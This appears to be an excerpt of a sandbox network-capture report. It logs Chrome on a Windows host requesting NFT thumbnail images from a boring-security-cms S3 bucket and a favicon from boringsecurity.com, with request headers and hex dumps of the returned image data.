                                                                          2023-12-10 16:45:03 UTC1579INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 01 08 00 ff c4 00 3c 10 00 02 01 03 03 01 06 03 06 05 03 04 03 01 00 00 01 02 03 00 04 11 05 12 21 31 06 13 22 41 51 61 71 81 91 07 14 32 a1 b1 c1 23 42 52 d1 f0 15 24 e1 16 33 43 62 08 82 92 f1 ff c4 00 1a
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("<!1"AQaq2#BR$3Cb
                                                                          2023-12-10 16:45:03 UTC4828INData Raw: 60 6e ae e1 81 1b 21 db 93 d3 9f 31 5f 43 f6 17 b3 50 e9 9a 1f dc 16 22 82 fe 13 24 ec dd 41 2b c2 fc b8 a3 e3 47 9d 96 54 99 5b b2 36 d7 7a bd d5 d6 a7 74 5c 06 91 76 30 5e 12 30 30 15 3d cf 20 7c 73 e5 46 3e d9 6e e4 97 b2 66 c2 3d 86 7e 0b 01 c8 04 11 c0 1e 9c 91 f2 a2 f6 77 10 69 76 69 22 0f 0a 00 96 d0 81 8c 1c 63 71 f7 c7 4f 41 f3 34 a5 aa b8 d5 2f 12 33 e2 2a 41 73 9e 83 fe 72 4f c3 14 f2 92 48 8e 2c 4f 24 84 0e cb f6 4b 50 9e e4 cb 6d 34 b1 64 ff 00 2b 1e 07 a5 3c 8f b2 b9 ef 97 bc 9e 45 dc 79 27 67 27 e3 4f 5d 94 d3 a2 84 29 0b c5 3e c2 a0 46 38 a8 29 36 cf 41 c2 31 e2 46 57 a5 fd 9b d9 59 db 81 2a 09 18 0f 31 c5 2f f6 9b b1 10 3a 4a 16 15 00 f9 01 5b 74 e0 0e 39 e6 80 ea d0 86 85 87 04 91 41 c9 86 31 5e 1f 1f eb 9a 34 9a 36 a0 e6 1c a6 24 e0 fb
                                                                          Data Ascii: `n!1_CP"$A+GT[6zt\v0^00= |sF>nf=~wivi"cqOA4/3*AsrOH,O$KPm4d+<Ey'g'O])>F8)6A1FWY*1/:J[t9A1^46$


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          217192.168.2.54994952.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC389OUTGET /thumbnail_MAYC_7e6a35562a.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:04 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 54 44 42 4c 46 66 6e 35 4c 6a 52 50 4e 72 4f 56 73 55 54 70 55 73 45 78 4a 71 37 50 2b 62 2f 50 36 39 30 37 2b 66 51 57 63 57 75 30 39 59 6a 35 4f 6d 5a 45 48 65 31 2b 4a 4c 4e 7a 47 68 63 31 51 78 34 4d 70 36 6b 50 46 34 45 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 4a 54 32 48 32 50 4d 56 35 43 30 39 56 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 30 20 4a 75 6e 20 32 30 32 33 20 30 36 3a 31 30 3a 30 36 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 30 35 36 61 61 62 33 63 64 38 30 65 30 36 31 61 61 66 39 39 33 36
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: TDBLFfn5LjRPNrOVsUTpUsExJq7P+b/P6907+fQWcWu09Yj5OmZEHe1+JLNzGhc1Qx4Mp6kPF4E=x-amz-request-id: FY4JT2H2PMV5C09VDate: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Tue, 20 Jun 2023 06:10:06 GMTETag: "056aab3cd80e061aaf9936
                                                                          2023-12-10 16:45:04 UTC1541INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 05 78 55 57 d6 bf 53 8a 4b 0c 22 10 77 d7 1b 77 77 77 81 b8 27 c4 9d 10 62 c4 15 77 2f b4 50 4a 4b 81 96 1a b4 40 4b 71 77 77 a8 4e a7 33 53 7f ff cf 3d 21 94 76 e6 fb be 99 ff d7 af 32 93 f3 3c fb 39 57 ce bd 37 d9 e7 3d bf b5 d6 5e 6b ef 23 71 b6 d1 7e c4 de 32 91 44 83 9f 92 f4 d1 d9 76 4d 17 5a 1c af dc e8 74 e1 46 a7 eb 0f d7 3b 5c 7e b8 d1 e9 2a 7e 3c dc 86 fb 80 7f a6 0f 1e 33 23 b0 73 a1 c5 f1 aa 98 a9 86 40 0d e9 e3 b3 ed 25 ee 74 bb 8e 90 78 b7 cc 52 e2 f9 74 63 9d f3 cd 8e 17 c5 1f b8 d9 25 fe 90 f0 81 61 c8 86 21 e3 ff a7 0f 06 d9 71 f9 e1 e6 e3 e7
                                                                          Data Ascii: PNGIHDRMpHYs IDATxxUWSK"wwww'bw/PJK@KqwwN3S=!v2<9W7=^k#q~2DvMZtF;\~*~<3#s@%txRtc%a!q
                                                                          2023-12-10 16:45:04 UTC15952INData Raw: 6f 21 3f b7 00 dd 49 06 6c 4c b3 e4 61 ff d3 01 c1 4f e1 ff 68 c0 83 e7 d2 4c b0 4f 35 c5 d4 5d 8d 39 41 1a 7c 3c cf e3 a7 e3 77 8f a1 1b fa 8e 27 30 fe 86 d0 0d fb 70 ff 02 6c 62 05 3b dd e4 c8 99 66 a7 27 27 7d 4d 9a 09 31 53 e5 58 10 6b 20 00 72 b7 c7 8d 5d 05 96 38 fa 6b a1 64 2b 4d 60 9d 12 46 09 13 50 d7 92 27 46 23 86 78 97 48 a2 fc fd 29 cc c9 22 c0 c6 92 81 79 dd c4 86 06 52 52 52 4a b4 67 0c 16 a3 4d 29 76 30 e2 8b c5 1e dc e9 f1 e0 da 93 3c eb 8f 7f cb d9 66 27 be 58 e4 c5 cb 39 66 68 d9 29 e3 5c 61 89 b7 d5 14 1e f5 0c 8e dd 89 c1 ba fa b8 89 2f 8e 8f 07 3c b8 d3 eb 2e 0c 28 0f 5d 2c bf 15 74 c3 c0 fd 77 1d f4 b3 b1 2d f1 e3 81 38 03 f1 c2 2c c2 89 bb d5 e3 4a b1 93 1a 2b cc 75 c9 75 50 e1 5e bf 3b 17 1b 1c f0 f5 d1 c0 2a d7 18 69 bd 91 c8 eb
                                                                          Data Ascii: o!?IlLaOhLO5]9A|<w'0plb;f''}M1SXk r]8kd+M`FP'F#xH)"yRRRJgM)v0<f'X9fh)\a/<.(],tw-8,J+uuP^;*i
                                                                          2023-12-10 16:45:04 UTC13117INData Raw: 36 c2 d5 cb 00 bf e0 71 84 46 99 11 16 3d 9e f0 58 0b 42 a2 c6 e3 1f 62 8c b3 87 54 8b 1a c1 6b c3 fa d0 bb 6f 37 86 0c 7b 19 8d 91 bd 19 a9 d5 97 91 5a fd e8 db af 3b 7d fb 75 c5 c9 5d 83 ec 22 33 e6 2d f5 e3 f0 d9 62 ce de a8 e1 c6 47 8d d4 cc 72 a1 d8 f9 35 a5 71 fc 6f a9 87 e7 00 6c 77 9f 56 d7 5b f6 c9 c9 85 7c b9 2d fd e3 29 e6 fc 63 86 25 df cd 32 e7 54 81 1e 69 8e c3 31 1c 67 83 7d 40 18 de 29 39 c4 16 35 10 9d 5d 4d 4c 5e 35 be 71 92 e9 46 31 6d 9e 0d 27 ae 14 28 eb ad b7 be 98 ca 96 fd 59 4a c3 8a 6c 0f 94 3b 4d 64 f7 fd 3b 17 b3 d9 b4 37 98 25 6b 9d 68 9e 67 43 66 e1 58 26 ba 0c e1 a5 97 3a 28 c3 44 7a f5 ee 82 96 ee 2b 38 ba 8c 22 21 d5 96 aa 46 1f 66 bd 1e c1 d2 75 09 bc b9 3d 9d 6d 6f e7 72 f8 7c 29 27 ae 56 70 ec 52 b9 22 e7 75 f2 6a 85 a2
                                                                          Data Ascii: 6qF=XBbTko7{Z;}u]"3-bGr5qolwV[|-)c%2Ti1g}@)95]ML^5qF1m'(YJl;Md;7%khgCfX&:(Dz+8"!Ffu=mor|)'VpR"uj


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          218192.168.2.54995152.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC390OUTGET /thumbnail_toven_0ba71c0c46.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:04 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 6e 4f 4f 6b 44 57 53 30 66 61 49 46 4c 57 68 4a 77 67 37 41 57 79 77 6f 4a 7a 4c 79 70 70 53 55 4e 39 50 31 75 71 49 43 6a 4f 2f 6e 4e 6f 67 7a 66 51 63 65 47 66 58 32 37 64 46 67 79 52 4d 71 6e 4e 58 38 47 45 52 38 46 39 51 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 45 41 56 37 32 38 57 45 53 4d 4b 38 45 34 53 42 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 35 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 32 35 20 4e 6f 76 20 32 30 32 33 20 30 37 3a 33 35 3a 35 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 37 36 39 65 37 34 63 35 36 64 64 33 37 65 32 31 61 36 32 33 30 64
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: nOOkDWS0faIFLWhJwg7AWywoJzLyppSUN9P1uqICjO/nNogzfQceGfX27dFgyRMqnNX8GER8F9Q=x-amz-request-id: EAV728WESMK8E4SBDate: Sun, 10 Dec 2023 16:45:05 GMTLast-Modified: Sat, 25 Nov 2023 07:35:53 GMTETag: "769e74c56dd37e21a6230d
                                                                          2023-12-10 16:45:04 UTC1543INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9f 00 00 00 9c 08 06 00 00 00 61 8f 79 4e 00 00 00 09 70 48 59 73 00 00 1d 87 00 00 1d 87 01 8f e5 f1 65 00 00 20 00 49 44 41 54 78 9c ec 9d 05 9c 55 d5 de f7 7d 9f f7 b9 cf 7d ee 55 69 98 19 98 6e a6 bb 93 ee b4 0b 05 15 09 01 01 31 b0 30 10 3b ae 08 b6 82 48 77 09 48 0d 35 dd 1d 4c 77 32 dd df f7 b3 f6 39 7b 4e 4c 00 32 5c bd f7 be 47 d7 67 ef b3 39 73 ce de 6b fd d6 ef 9f eb bf ee 58 b1 af 90 e5 7b 0b 11 c7 ff f4 b6 7c 6f 41 d7 51 3e ef 8f ef 54 7d 97 38 ff e3 9f 73 c5 1f d5 d4 fa e2 99 1f e3 b9 43 d1 41 7f 82 1b fb 13 81 ec 39 d1 f6 6b b5 5e 40 a5 fd 1d f2 df ae d4 fa db e7 ae 73 1f 2b fe 43 fa 5d c6 da 82 af 42 ff 33 c0 d7 1b d8 d4 41 26 de 2f db 5b c0 d2 3d 05 2c da 95 cf c2 9d 9a ed 99 9d f9
                                                                          Data Ascii: PNGIHDRayNpHYse IDATxU}}Uin10;HwH5Lw29{NL2\Gg9skX{|oAQ>T}8sCA9k^@s+C]B3A&/[=,
                                                                          2023-12-10 16:45:04 UTC16384INData Raw: ff 66 a9 f2 99 c5 bd 3c b7 2f 9f f7 4f 15 71 24 a1 92 fc ca 46 0d 46 bc 51 55 a3 2f 51 1c 95 d7 20 59 c5 e2 b7 fe 28 31 fc a7 00 9f b6 98 15 03 f0 e2 e1 22 29 e6 7a a3 6c a7 b0 30 7b 07 5d 67 47 07 e9 25 f5 fc 12 51 ce cb 87 85 53 56 21 42 9f dd a3 09 02 4d 90 c8 9d d3 7f 49 9f cb 7b cc b0 e9 0e 48 f1 7b 82 75 05 f3 3f bb 27 9f 8f 4f 17 73 3e a3 86 9a 06 95 d3 5c 61 51 df 1c 08 d5 27 70 75 43 3b ff 08 29 d7 b0 88 ff 99 62 f8 0f 05 9f f6 4c 13 0f 2f f4 91 4f cf 95 51 d9 d0 76 d3 22 b6 a7 19 de d0 dc ca c5 cc 1a 3e fc ad 88 25 bb f3 54 71 51 8d 94 25 4d 00 48 2e 89 5b 02 58 4f 4c d7 fb a0 2a 7e ab a0 eb a8 9d f2 25 ce 85 88 16 f7 fe e2 a1 02 69 02 65 97 ab d8 50 02 e1 f5 26 67 1f 7d 74 24 f1 9a a4 53 cb fd f2 1f c0 7c 2a e0 c9 33 4e 30 9e c8 99 93 3b 49 bd
                                                                          Data Ascii: f</Oq$FFQU/Q Y(1")zl0{]gG%QSV!BMI{H{u?'Os>\aQ'puC;)bL/OQv">%TqQ%MH.[XOL*~%ieP&g}t$S|*3N0;I
                                                                          2023-12-10 16:45:04 UTC1024INData Raw: 1a cd 59 89 74 64 26 53 9f 93 c2 c6 f7 df 61 f6 e4 c9 04 7a 79 49 4b 1b ad cd ad 71 b2 13 85 7c 02 09 f0 0a 22 c8 37 98 40 ff 60 82 03 c6 32 26 68 1c e3 c7 4e 60 f2 84 a9 04 fa 8c 65 b4 99 3d 23 86 8c 64 c8 c0 11 0c 1b ac cb 70 e1 fa 19 3a 12 5b 4b 7b fc dd fc 18 6d 2c 96 59 3e 4e 53 63 63 0f 51 1e 75 f6 eb 99 f9 fe 59 4b 27 f7 a8 2f 9d ec c1 d8 90 ef ef 68 92 a6 8f b1 db a2 71 39 ad 4a 3d ca 71 2b 8b c6 6f 5a f4 f6 b9 68 5c 66 be 5f 29 29 5c 45 6a e2 12 a6 04 39 e1 6c 69 81 91 8e 0e 56 e6 66 f8 7a b8 e2 ef 2d 80 27 00 e7 4d a0 9f 70 81 28 9b 9f 2f 81 be a2 09 36 f2 27 38 20 80 b1 41 c1 8c 0f 1a c3 84 a0 60 c6 fa f9 e1 ef e1 8a b7 8b 13 2e 4e 2e d8 b8 fa 61 37 f6 21 26 2e fa 90 e7 3f 39 c2 9e df 92 b9 9a 57 4a 5b 69 0e e4 27 42 41 0a 94 66 10 17 72 9c 65
                                                                          Data Ascii: Ytd&SazyIKq|"7@`2&hN`e=#dp:[K{m,Y>NSccQuYK'/hq9J=q+oZh\f_))\Ej9liVfz-'Mp(/6'8 A`.N.a7!&.?9WJ[i'BAfre
                                                                          2023-12-10 16:45:04 UTC7544INData Raw: 0f 96 86 96 0c bd 6b 18 f3 ee 7f 8c a2 fc 02 25 eb 69 3e bf f6 c0 f6 36 f0 5d 25 d2 6a 44 89 b4 c2 db 52 22 ed cb 90 92 1b 2a 91 96 5a da dc ad 4a 56 37 f0 c9 f5 5a 3e 3c 5d da 4d 9f e8 ad 38 e4 8b 1a c5 21 fb e7 01 7b ca aa 56 ff dd 8a b2 cd e4 65 2f a6 a2 6c 0d 9f 7d 30 1d 07 2b 03 2c 2d 8c 70 77 72 c4 db d5 09 2f 17 27 bc c4 51 79 ee e9 e2 8c a7 74 74 c4 db cd 19 5f 4f 21 9e 85 23 d8 93 40 7f 1f 89 01 c7 06 05 32 36 38 48 6a 01 3e de cc 99 31 43 fa ad 98 98 68 82 02 82 25 cb 55 2c ee 11 af d5 ab d6 e2 e9 19 8c bb 9b 1f 36 66 56 98 8e 30 20 30 e8 11 1e 7d 71 0b f7 3f f9 16 56 16 36 e8 dc 75 b7 04 3c 43 5d 43 f4 86 8d 44 6f a8 1e 46 86 66 18 9a 59 32 72 e4 48 9c 1c 6d a4 89 31 36 c0 0f 7f bf 20 26 4d 9e 84 97 87 27 2e a3 9d 89 b8 14 aa b9 32 4d 83 e9 14
                                                                          Data Ascii: k%i>6]%jDR"*ZJV7Z><]M8!{Ve/l}0+,-pwr/'Qytt_O!#@268Hj>1Ch%U,6fV0 0}q?V6u<C]CDoFfY2rHm16 &M'.2M
                                                                          2023-12-10 16:45:04 UTC6353INData Raw: 0b cf e3 a1 55 0f e2 b7 2b 57 62 f9 dd 77 a2 bd b5 15 75 d9 2e 2e 3a fa e6 9f 09 8f e4 c6 f0 11 c7 70 ef 57 97 5b c8 60 ea 71 58 11 f2 4b 08 fa bd b0 db 6a d8 55 2d 98 0d 68 ed bf 02 8b 57 ed c2 7c d6 fc 0e fe fd a1 f7 85 22 13 3d 2e cc 58 39 88 f7 46 07 de 2b 03 9f 73 5a 35 f8 3d ff ce c1 37 d4 13 25 00 ae 7c 23 5f 80 1c 02 00 e9 fe 37 2f 6d c2 2b 6f 9f 89 4d 03 73 b0 65 53 3f a6 f4 d6 a2 a6 d2 08 51 b0 73 c1 c0 1a 5f 69 4f 97 00 e7 d3 9c c5 45 f0 69 ba 1f eb 7d 41 72 a6 78 34 d6 a3 7e ae 28 e0 e9 a7 9e d4 00 ff d5 6e 4c 9e 38 09 2e bb 8d c1 97 8c c4 91 0c a7 d9 c6 5e 69 18 06 d9 47 4c e7 84 d5 66 81 c7 e3 61 f0 91 e4 e2 b0 db d0 d5 d9 c1 8b f8 78 ff ed 9e 3d 07 35 57 e5 f4 a5 3f 46 38 94 42 7d 6e 0c 7a 27 2d 42 4b 4b 27 8e f9 e1 ff e4 aa bb 36 9a e0 8a
                                                                          Data Ascii: U+Wbwu..:pW[`qXKjU-hW|"=.X9F+sZ5=7%|#_7/m+oMseS?Qs_iOEi}Arx4~(nL8.^iGLfax=5W?F8B}nz'-BKK'6


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          219192.168.2.54995252.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC400OUTGET /thumbnail_Lazy_Lions_118_4a741f9816.jpeg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:04 UTC377INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 70 71 51 57 33 51 76 35 69 71 2b 38 72 30 65 70 75 49 35 54 2b 47 4c 43 77 62 75 30 73 53 4c 63 2b 6b 44 68 58 4e 34 38 2b 59 4e 67 68 49 4f 48 56 76 50 2f 4f 43 48 48 42 57 65 59 4b 47 7a 4a 56 33 51 74 34 32 6b 50 50 72 38 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 45 41 56 46 41 51 59 45 47 57 5a 41 53 33 59 37 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 35 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 30 33 3a 34 31 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 61 30 37 65 64 34 61 65 34 66 63 35 62 64 37 38 36 65 65 39 33 39
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: pqQW3Qv5iq+8r0epuI5T+GLCwbu0sSLc+kDhXN48+YNghIOHVvP/OCHHBWeYKGzJV3Qt42kPPr8=x-amz-request-id: EAVFAQYEGWZAS3Y7Date: Sun, 10 Dec 2023 16:45:05 GMTLast-Modified: Fri, 23 Sep 2022 00:03:41 GMTETag: "a07ed4ae4fc5bd786ee939
                                                                          2023-12-10 16:45:04 UTC6065INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 08 01 02 09 ff c4 00 41 10 00 01 03 03 02 03 05 05 05 06 05 03 05 00 00 00 01 02 03 04 00 05 11 06 12 21 31 41 07 13 22 51 61 14 32 71 81 a1 23 42 52 72 91 08 15 62 92 b1 c1 24 33 43 82 e1 16 73 d1 34 53 a2
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("A!1A"Qa2q#BRrb$3Cs4S


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          220192.168.2.54995375.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:04 UTC353OUTGET /favicon.ico HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:05 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 33 37 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 34 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 35 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 64 37 66 65 38 61 38 65 65 34 66 39 32
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50937Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 15406Content-Type: image/vnd.microsoft.iconDate: Sun, 10 Dec 2023 16:45:05 GMTEtag: "d7fe8a8ee4f92
                                                                          2023-12-10 16:45:05 UTC777INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 01 00 00 00 01 01 00 00 00 00 00 01 00 00 00 00 00 01 00 4c 4d 4d 14 46 47 46 37 4c 47 42 36 51 51 50 13 00 00 01 00 00 01 00 00 00 01 01 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 47 47 41 56 44 45 3e ca 42 40 3b fe 3e 3c 39 ff 3a 39 35 ff 44 43 3f fe 47 47 42 c6 40 41 41 50 00 00 00 00 00 00 01 00 00 00 01 00 01 00 00 00 01 00 00 00 00 00 00 00 40 40 40 08 4c 4b 46 aa 40 3f 3a ff 27 27 23 ff 1d 1d 1a ff 1d 1c 1b ff 1f
                                                                          Data Ascii: h6 (00 h&( LMMFGF7LGB6QQPGGAVDE>B@;><9:95DC?GGB@AAP@@@LKF@?:''#
                                                                          2023-12-10 16:45:05 UTC2372INData Raw: ff 20 23 20 ff 24 26 24 ff 2f 31 2e ff 51 51 4c c3 00 01 01 00 00 00 00 00 7b 74 71 58 50 4c 48 ff 2b 2a 28 ff 2c 2c 2b ff 2e 2d 2b ff 27 26 24 ff 2f 2e 2c ff 4f 4d 49 ff 78 76 71 ff 37 37 34 ff 22 27 23 ff 25 26 25 ff 42 41 3d ff 52 52 4e 4e 00 00 00 00 01 00 00 00 00 00 00 00 79 73 6d ab 40 3f 3a ff 27 27 25 ff 53 50 4d ff 57 53 4f ff 54 52 4e ff 56 55 50 ff 49 48 44 ff 4c 4a 46 ff 23 26 23 ff 40 3f 3b ff 59 57 53 a1 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 9f 9f 9f 08 7c 77 71 ab 4f 4b 47 ff 2e 2f 2c ff 2d 2c 2a ff 29 29 28 ff 28 28 26 ff 26 26 25 ff 2c 2c 2a ff 49 46 43 ff 5b 5a 53 a2 55 55 54 06 00 00 00 00 01 01 01 00 00 00 00 00 00 00 01 00 01 00 01 00 01 00 00 00 8b 85 80 56 74 6f 69 ca 57 54 4f fe 49 46 42 ff 45 43 3f ff 50 4d 49 fe 61 5d
                                                                          Data Ascii: # $&$/1.QQL{tqXPLH+*(,,+.-+'&$/.,OMIxvq774"'#%&%BA=RRNNysm@?:''%SPMWSOTRNVUPIHDLJF#&#@?;YWS|wqOKG./,-,*))(((&&&%,,*IFC[ZSUUTVtoiWTOIFBEC?PMIa]
                                                                          2023-12-10 16:45:05 UTC538INData Raw: 80 59 54 4f ff 30 2f 2c ff 24 25 21 ff 25 25 21 ff 22 22 20 ff 22 23 20 ff 22 23 20 ff 20 20 1d ff 32 32 2e ff 8b 88 82 ff 8e 8b 87 ff 8d 8a 85 ff 9f 9c 96 ff 9b 97 93 ff 9e 9b 97 ff 94 91 8d ff 94 92 8e ff a0 9e 9b ff 56 58 57 ff 21 23 20 ff 23 25 22 ff 21 23 21 ff 21 22 20 ff 22 25 23 ff 22 26 24 ff 24 27 26 ff 38 38 35 ff 48 49 44 ff 50 53 4e 6c 00 00 00 00 00 00 00 00 74 6e 66 80 57 53 4f ff 32 32 2f ff 29 28 25 ff 26 27 23 ff 24 24 21 ff 23 24 21 ff 22 23 20 ff 20 20 1e ff 22 23 20 ff 88 84 7f ff 8e 8a 84 ff 94 91 8c ff a8 a4 a0 ff 9c 99 93 ff a0 9d 98 ff 9e 9b 97 ff af aa a7 ff aa a8 a4 ff 87 86 85 ff 1d 1f 1d ff 21 23 20 ff 21 22 20 ff 20 22 20 ff 21 24 22 ff 25 27 25 ff 25 28 26 ff 38 38 36 ff 4c 4c 48 ff 5c 5c 5a 6c 00 00 00 00 00 00 00 00 81 7a
